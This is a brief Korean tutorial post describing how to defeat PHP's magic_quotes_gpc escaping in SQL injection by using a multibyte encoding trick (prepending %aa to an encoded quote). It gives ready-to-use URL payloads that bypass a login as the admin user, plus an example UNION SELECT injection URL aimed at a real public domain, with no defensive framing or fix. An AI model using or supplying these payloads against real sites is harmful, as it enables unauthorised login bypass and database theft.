mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기

PHP에서 SQL-Injection을 할때, magic_quotes_gpc 설정때문에 '입력이 안될경우 :

 

mb_convert_encoding 취약점 (%a1 ~ %fe 으로 magic_quotes_gpc %27 우회)

차단 : id=%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest
우회 : id=%aa%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest

예문) http://www.tistory.com/index.php?id=binaryu%aa%27/*&pw=*/union/**/select/**/3%23